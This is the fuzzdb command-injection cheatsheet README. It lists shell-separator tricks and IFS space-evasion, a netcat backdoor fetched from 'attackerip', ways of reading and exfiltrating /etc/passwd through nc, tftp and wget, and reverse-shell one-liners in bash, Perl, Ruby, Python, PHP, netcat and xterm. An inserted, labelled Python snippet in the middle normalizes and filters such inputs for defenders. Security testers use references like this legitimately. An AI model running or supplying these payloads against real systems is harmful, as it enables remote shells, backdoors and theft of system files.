fuzzdb/attack/os-cmd-execution/README.md
2016-10-04 09:13:29 -04:00

Remote Command Exec Cheatsheet

Executing Commands

Various ways of separating Commands:
blah;blah2

blah ^ blah 2

blah && blah2

FAIL || X

blah%0Dblah2%0Dblah3

`blah`

`blah & blah2`

Shell commands without spaces

Using Internal Field Separator (IFS):
Test for cmd injection without spaces:
sleep${IFS:0:1}20

Example IFS netcat backdoor without spaces:
{wget,http://attackerip/nc}
{chmod,+x,./nc}
{./nc,-l,-p,1234,-e,/bin/bash}

$IFS shell variable:
cat$IFS/etc/passwd
Increment the first +1 to retrieve the entire file, line by line:
cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1

Shell Variables:
CMD=$'cat\x20/etc/passwd';$CMD

Shell variable, increment through the file one line at a time.
Increment the first +1 to retrieve the entire file, line by line:
SP=$'\x20';cat$SP/etc/passwd|tail$SP-n+1|head$SP-n+1
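Added example (not part of the fuzzdb page): a small Python normalizer for the defending side that undoes the URL-encoded separators and the IFS / `\x20` / brace-expansion space tricks listed in the two sections above, so a log reviewer or input filter sees the command the shell would actually run, together with the allowlist check that rejects such arguments outright. The sample strings come from the cheatsheet; the function names and the allowlist pattern are my own.

```python
import re
from urllib.parse import unquote

# Space-substitution tricks from the cheatsheet, each mapped back to a plain
# space so the de-obfuscated command reads the way bash would execute it.
SPACE_TRICKS = [
    (re.compile(r"\$\{IFS(?::\d+:\d+)?\}"), " "),  # ${IFS}, ${IFS:0:1}
    (re.compile(r"\$IFS"), " "),                   # cat$IFS/etc/passwd
    (re.compile(r"\\x20"), " "),                   # $'cat\x20/etc/passwd'
]
# {wget,url} style brace expansion: bash emits the comma-separated words.
BRACE_WORDS = re.compile(r"\{([^{}\s]+(?:,[^{}\s]+)+)\}")
# Command separators and substitution operators from the cheatsheet;
# CR/LF are included because %0D/%0A decode to them.
SEPARATORS = re.compile(r"\|\||&&|[;&|`\r\n]|\$\(")
# Conservative allowlist for a single filename-like argument: no shell
# metacharacters and no '$', '{' or '%', so none of the tricks above fit.
ALLOWED_ARG = re.compile(r"^[\w./-]+$")


def normalize(arg: str) -> str:
    """Undo URL encoding, IFS/\\x20 space tricks and brace expansion."""
    s = unquote(arg)  # %0D -> CR, %3B -> ';' and so on
    for pattern, repl in SPACE_TRICKS:
        s = pattern.sub(repl, s)
    return BRACE_WORDS.sub(lambda m: m.group(1).replace(",", " "), s)


def injection_findings(arg: str) -> list[str]:
    """Separator tokens present after normalization (empty list: none found).
    CR and LF are reported by name so findings stay printable in a log."""
    tokens = [m.group(0) for m in SEPARATORS.finditer(normalize(arg))]
    return [{"\r": "CR", "\n": "LF"}.get(t, t) for t in tokens]


def is_safe_argument(arg: str) -> bool:
    """Allowlist check on the raw value: rejecting beats decoding. A leading
    '-' may still be read as an option by the target program, so also pass
    '--' before any user-supplied argument."""
    return bool(ALLOWED_ARG.match(arg))


if __name__ == "__main__":
    # Constructed samples, taken from the separator and IFS sections above.
    for sample in ["blah;blah2", "blah%0Dblah2%0Dblah3", "sleep${IFS:0:1}20",
                   "cat$IFS/etc/passwd|tail$IFS-n+1|head$IFS-n+1",
                   "{chmod,+x,./nc}", "report-2016.txt"]:
        print(f"{sample!r:48} -> {normalize(sample)!r} "
              f"separators={injection_findings(sample)} "
              f"safe={is_safe_argument(sample)}")
```

Note that `sleep${IFS:0:1}20` carries no separator at all, so only the allowlist catches it; separator matching alone is a detection aid, not the control.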

Exfiltrating Files / Data

FTP
Make a new text file, and echo and then redirect to FTP

NC
'nc -e /bin/sh'

NC
'echo /etc/passwd | nc host port'

TFTP
'echo put /etc/passwd | tftp host'

WGET:
'wget --post-file /etc/passwd'

One-Liner Reverse Shells

On the listener
$ nc -l -p 1234 -vvv

On the remote host...

Bash:
$ bash -i >& /dev/tcp/attackerip/1234 0>&1

$ exec 5<>/dev/tcp/attackerip/1234
$ cat <&5 | while read line; do $line 2>&5 >&5; done

Perl
$ perl -e 'use Socket;$i="attackerip";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl for Windows target:
$ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby
$ ruby -rsocket -e'f=TCPSocket.open("attackerip",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Python
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP
$ php -r '$sock=fsockopen("attackerip",1234);exec("/bin/sh -i <&3 >&3 2>&3");' (Assumes the TCP socket uses file descriptor 3. If it doesn't work, try 4, 5, or 6.)

Netcat
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 1234 >/tmp/f

Bash
bash -i >& /dev/tcp/attackerip/1234 0>&1

XTERM
To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001) with Xnest:

Xnest :1
Authorize the target IP's connection to you:

Run this OUTSIDE the Xnest:
xterm -display 127.0.0.1:1

Run this INSIDE the spawned xterm on the open X Server
xhost +targetip

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
xterm -display attackerip:1
or
DISPLAY=attackerip:0 xterm
It will try to connect back to you, attackerip, on TCP port 6001.

If the xterm path is not within the PATH environment variable, you need to specify its filepath. Solaris path example:
/usr/openwin/bin/xterm -display attackerip:1


More docs: /docs/attack-docs/remote-cmd-exfiltration/